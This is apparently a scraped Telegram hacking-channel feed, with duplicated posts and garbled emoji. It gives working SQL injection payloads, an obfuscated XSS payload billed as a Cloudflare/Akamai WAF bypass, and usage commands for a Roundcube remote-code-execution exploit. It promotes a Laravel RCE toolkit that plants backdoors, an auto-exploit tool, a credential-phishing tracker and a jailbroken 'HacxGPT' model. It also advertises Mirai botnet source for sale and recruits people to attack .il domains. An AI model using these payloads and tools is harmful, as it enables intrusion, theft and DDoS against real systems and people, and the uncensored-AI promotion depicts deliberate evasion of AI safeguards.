Blind SQL Injection
Tips:
1. Gather all urls from gau/waybackurls and Google Dorking.
2. Inject SQLi payload in all parameters one by one.
3. Analyze the response.
Payload used:
#BugBounty #Payload #SQLi
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
Tips:
1. Gather all urls from gau/waybackurls and Google Dorking.
2. Inject SQLi payload in all parameters one by one.
3. Analyze the response.
Payload used:
0'XOR(if(now()=sysdate(),sleep(10),0)) XOR'Z#BugBounty #Payload #SQLi
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β€7π₯4β‘2
Useful Wireshark Filters
#WireShark #Tips
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
#WireShark #Tips
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
π₯5β‘2β€2
SQL injection ID parameter
?id=1' order by 1 --+
?id=1' and "a"="a"--+
?id=1' and database()="securtiy"--+
?id=1' and substring(database(),1,1)="a"--+
?id=1' and sleep(2) and "a"="a"--+
?id=1' and sleep(2) and substring(database(),1,1)="a"--+
#SQL #Injection #Tips
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
?id=1' order by 1 --+
?id=1' and "a"="a"--+
?id=1' and database()="securtiy"--+
?id=1' and substring(database(),1,1)="a"--+
?id=1' and sleep(2) and "a"="a"--+
?id=1' and sleep(2) and substring(database(),1,1)="a"--+
#SQL #Injection #Tips
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
π₯5β€3β‘1
This media is not supported in your browser
VIEW IN TELEGRAM
How to use Gobuster to brute-force directories!
$
dir: Directory scanning
-u: Target URL
-w: Path to wordlist file
β¬οΈ Download
#GoBuster #Tips #Tools
ββββββββββ
π£ T.me/BugCod3
π£ T.me/Exploit_Forge
$
gobuster dir -u <target-URL> -w <wordlist>dir: Directory scanning
-u: Target URL
-w: Path to wordlist file
β¬οΈ Download
#GoBuster #Tips #Tools
ββββββββββ
π£ T.me/BugCod3
π£ T.me/Exploit_Forge
π₯4β€3β‘1
WAF bypass for Akamai and Cloudflare
Payload:
#WAF #Akamai #Cloudflare
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
Payload:
<address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+(['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address>#WAF #Akamai #Cloudflare
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
1β€4β‘2π₯2
HacxGPT
The cutting-edge AI developed by BlackTechX, inspired by WormGPT, designed to push the boundaries of natural language processing.
π― Features:
βͺοΈ Powerful AI Conversations: all questions will be answered in goodflow.
βͺοΈ Broken AI: Can do anything you want !!
βοΈ Installation:
Github
β¬οΈ Download
π
#Ai #Hackers #Tools
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
The cutting-edge AI developed by BlackTechX, inspired by WormGPT, designed to push the boundaries of natural language processing.
π― Features:
βͺοΈ Powerful AI Conversations: all questions will be answered in goodflow.
βͺοΈ Broken AI: Can do anything you want !!
βοΈ Installation:
sudo apt-get update; apt-get upgrade -y
sudo apt-get install git wget python3 -y
cd Hacx-GPT
pip install -r requirements.txt
python3 main.py
Github
β¬οΈ Download
π
BugCod3#Ai #Hackers #Tools
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β€4π₯3β‘2
CVE-2025-49113 - Roundcube Remote Code Execution
A proof-of-concept exploit for CVE-2025-49113, a remote code execution vulnerability in Roundcube Webmail.
π¬ Description:
This exploit targets a deserialization vulnerability in Roundcube Webmail versions 1.5.0 through 1.6.10. The vulnerability allows an authenticated attacker to execute arbitrary code on the server.
π΄ββ οΈ Vulnerable Versions:
βͺοΈ 1.5.0 - 1.5.9
βͺοΈ 1.6.0 - 1.6.10
π Requirements:
βͺοΈ PHP 7.0 or higher
βͺοΈ cURL extension enabled
βͺοΈ Target running a vulnerable version of Roundcube
π» Usage:
πΌ Example:
Github
β¬οΈ Download
π
#CVE #PHP #RemoteCode
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
A proof-of-concept exploit for CVE-2025-49113, a remote code execution vulnerability in Roundcube Webmail.
π¬ Description:
This exploit targets a deserialization vulnerability in Roundcube Webmail versions 1.5.0 through 1.6.10. The vulnerability allows an authenticated attacker to execute arbitrary code on the server.
π΄ββ οΈ Vulnerable Versions:
βͺοΈ 1.5.0 - 1.5.9
βͺοΈ 1.6.0 - 1.6.10
π Requirements:
βͺοΈ PHP 7.0 or higher
βͺοΈ cURL extension enabled
βͺοΈ Target running a vulnerable version of Roundcube
π» Usage:
php CVE-2025-49113.php <url> <username> <password> <command>
πΌ Example:
php CVE-2025-49113.php http://localhost/roundcube/ admin password "id"
Github
β¬οΈ Download
π
BugCod3#CVE #PHP #RemoteCode
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β‘4β€3π₯3
Hi π , friends who want to help us in attacking the
T.me/BugCod3BOT
.il domain address can provide their type of help in the bot below and contact us.T.me/BugCod3BOT
5π₯8
Networking Commands
#Network #Command
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
#Network #Command
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β€6π₯3β‘1
BadMod auto exploit tool
π¬ CMS auto detect and exploit.
π» Installation:
Github
β¬οΈ Download
π
#PHP #Auto #Exploitation
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
π¬ CMS auto detect and exploit.
π» Installation:
chmod +x INSTALL
./INSTALL
Github
β¬οΈ Download
π
BugCod3#PHP #Auto #Exploitation
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β€4π₯4β‘2
Trape (stable) v2.0
π¬
Trape is an OSINT analysis and research tool, which allows people to track and execute intelligent social engineering attacks in real time. It was created with the aim of teaching the world how large Internet companies could obtain confidential information such as the status of sessions of their websites or services and control their users through their browser, without their knowledge, but It evolves with the aim of helping government organizations, companies and researchers to track the cybercriminals.
π Some benefits:
βͺοΈ LOCATOR OPTIMIZATION
βͺοΈ APPROACH
βͺοΈ REST API
βͺοΈ PROCESS HOOKS
βͺοΈ PUBLIC NETWORK TUNNEL
βͺοΈ CLICK ATTACK TO GET CREDENTIALS
βͺοΈ NETWORK
βͺοΈ PROFILE
π» Usage:
Github
β¬οΈ Download
π
#Python #Osint #Security #Tracking #Tools
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
π¬
Trape is an OSINT analysis and research tool, which allows people to track and execute intelligent social engineering attacks in real time. It was created with the aim of teaching the world how large Internet companies could obtain confidential information such as the status of sessions of their websites or services and control their users through their browser, without their knowledge, but It evolves with the aim of helping government organizations, companies and researchers to track the cybercriminals.
π Some benefits:
βͺοΈ LOCATOR OPTIMIZATION
βͺοΈ APPROACH
βͺοΈ REST API
βͺοΈ PROCESS HOOKS
βͺοΈ PUBLIC NETWORK TUNNEL
βͺοΈ CLICK ATTACK TO GET CREDENTIALS
βͺοΈ NETWORK
βͺοΈ PROFILE
π» Usage:
cd trape
pip3 install -r requirements.txt
python3 trape.py -h
#Example: python3 trape.py --url http://example.com --port 8080
Github
β¬οΈ Download
π
BugCo3#Python #Osint #Security #Tracking #Tools
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
π₯3β€2β‘1
GhostRecon
π¬
GhostRecon is a passive reconnaissance tool used in cybersecurity and web penetration testing that automates the discovery of subdomains, IP addresses, and ASN (Autonomous System Number) information for a target domain. It leverages publicly available data sources and OSINT techniques to streamline the information gathering process. Additionally, it can identify active IP addresses and detect the presence of Content Delivery Networks (CDNs) and Web Application Firewalls (WAFs) to support security analysis.
π What Recon Tool Does:
βͺοΈ Find All Subdomains
βͺοΈ Find All URLs ASN
βͺοΈ Fetching IP
βͺοΈ Identify Live IPs
βͺοΈ Detect CDN/WAF
To Buy: T.me/BugCod3BOT
π¬
GhostRecon is a passive reconnaissance tool used in cybersecurity and web penetration testing that automates the discovery of subdomains, IP addresses, and ASN (Autonomous System Number) information for a target domain. It leverages publicly available data sources and OSINT techniques to streamline the information gathering process. Additionally, it can identify active IP addresses and detect the presence of Content Delivery Networks (CDNs) and Web Application Firewalls (WAFs) to support security analysis.
π What Recon Tool Does:
βͺοΈ Find All Subdomains
βͺοΈ Find All URLs ASN
βͺοΈ Fetching IP
βͺοΈ Identify Live IPs
βͺοΈ Detect CDN/WAF
To Buy: T.me/BugCod3BOT
β€4π₯3β‘1
Mirai DDoS source with botnet and all tools and peripherals for sale, urgent sale
To Buy: T.me/BugCod3BOT
To Buy: T.me/BugCod3BOT
π₯7
RFC-compliant payloads for email and phone number fields
#RFC #Payload
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
#RFC #Payload
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β€4π₯4β‘2
Burp Suite MCP Server Extension with scan and crawl features
π¬
This an extended MCP Server Extension for BurpSuite proxy with scan and crawl based on the original.
For Building instructions follow below the original README as provided from PortSwigger, for direct use, load the extension provided on your Burp proxy.
π Features:
βͺοΈ Connect Burp Suite to AI clients through MCP
βͺοΈ Automatic installation for Claude Desktop
βͺοΈ Comes with packaged Stdio MCP proxy server
π» Usage:
βͺοΈ Install the extension in Burp Suite
βͺοΈ Configure your Burp MCP server in the extension settings
βͺοΈ Configure your MCP client to use the Burp SSE MCP server or stdio proxy
βͺοΈ Interact with Burp through your client!
πΌ Installation:
Prerequisites
βͺοΈ Java
βͺοΈ Jar Command
Github
β¬οΈ Download
π
#Burp #Suite #Extension
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
π¬
This an extended MCP Server Extension for BurpSuite proxy with scan and crawl based on the original.
For Building instructions follow below the original README as provided from PortSwigger, for direct use, load the extension provided on your Burp proxy.
π Features:
βͺοΈ Connect Burp Suite to AI clients through MCP
βͺοΈ Automatic installation for Claude Desktop
βͺοΈ Comes with packaged Stdio MCP proxy server
π» Usage:
βͺοΈ Install the extension in Burp Suite
βͺοΈ Configure your Burp MCP server in the extension settings
βͺοΈ Configure your MCP client to use the Burp SSE MCP server or stdio proxy
βͺοΈ Interact with Burp through your client!
πΌ Installation:
Prerequisites
βͺοΈ Java
βͺοΈ Jar Command
cd burp-mcp
./gradlew embedProxyJar
#Open Burp Suite
#Access the Extensions Tab
#Add the Extension
Github
β¬οΈ Download
π
BugCod3#Burp #Suite #Extension
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β€6β‘4π₯1π€£1
Revelar β Origin Reveal PRO
πβπ¨ Overview:
Revelar (Origin Reveal PRO) is a professional Go-based CLI tool for uncovering real/origin IP addresses of websites behind CDNs such as Cloudflare, Akamai, Fastly, Imperva, and AWS CloudFront.
π Features:
βͺοΈ Detects CDN providers automatically.
βͺοΈ Collects DNS records (A, AAAA, MX, Reverse DNS).
βͺοΈ Extracts SSL Subject Alternative Names (SANs).
βͺοΈ Integrates with optional external tools (
βͺοΈ Filters CDN IP ranges to isolate real origin candidates.
βͺοΈ Active verification engine
πΌ Installation:
Install via go install:
or
π» Usage:
πΈ Github
β¬οΈ Download
π
#Revelar #CDN #Finder #RealIP #Discovery #Tool
β β β β β β β β β β
π£ T.me/BugCod3
π£ T.me/RootAccessClub
Revelar (Origin Reveal PRO) is a professional Go-based CLI tool for uncovering real/origin IP addresses of websites behind CDNs such as Cloudflare, Akamai, Fastly, Imperva, and AWS CloudFront.
subfinder, amass, dnsx, httpx, nuclei).Install via go install:
go install github.com/MRvirusIR/Revelar@latest
or
cd Revelar
./Revelar -d example.com #For Run
./Revelar -h
BugCod3#Revelar #CDN #Finder #RealIP #Discovery #Tool
Please open Telegram to view this post
VIEW IN TELEGRAM
10β€7β‘3π₯3π1
If this post gets support and a lot of reactions, we will prepare and create many more cool tools for you to use and enjoy. π₯
π₯13β€2
Laravel RCE Exploitation Toolkit π€
Purpose: Exploits Laravel RCE vulnerability by using a known APP_KEY to generate a malicious payload that leads to remote code execution. If successful, it writes a backdoor to the server and logs the URLβ
π» Github
#Exploit #laravel #Rce #Rcr_Exploit
Join Exploit ForgeβοΈ
Join Exploit Forge ForumβοΈ
Join BugCod3βοΈ
Purpose: Exploits Laravel RCE vulnerability by using a known APP_KEY to generate a malicious payload that leads to remote code execution. If successful, it writes a backdoor to the server and logs the URL
#Exploit #laravel #Rce #Rcr_Exploit
Join Exploit Forge
Join Exploit Forge Forum
Join BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯5β‘4β€1
CVE-2025-24893 π€
is a critical unauthenticated remote code execution (RCE) vulnerability affecting the XWiki Platformπ©·
Summaryβ
Affected Versionsβ
XWikiπ€ 5.3-milestone-2 up to < 15.10.11 π¦
XWikiπ€ 16.0.0-rc-1 up to < 16.4.1 π¦
CVSS v3.1 Score : 9.8 (Critical)π«
Githubπ
#Rce #Exploit
Join Exploit Forgeπ
Join Exploit Forge Forumπ
Join BugCod3π
is a critical unauthenticated remote code execution (RCE) vulnerability affecting the XWiki Platform
Summary
Affected Versions
XWiki
XWiki
CVSS v3.1 Score : 9.8 (Critical)
Github
#Rce #Exploit
Join Exploit Forge
Join Exploit Forge Forum
Join BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯6β‘4β€1π1π1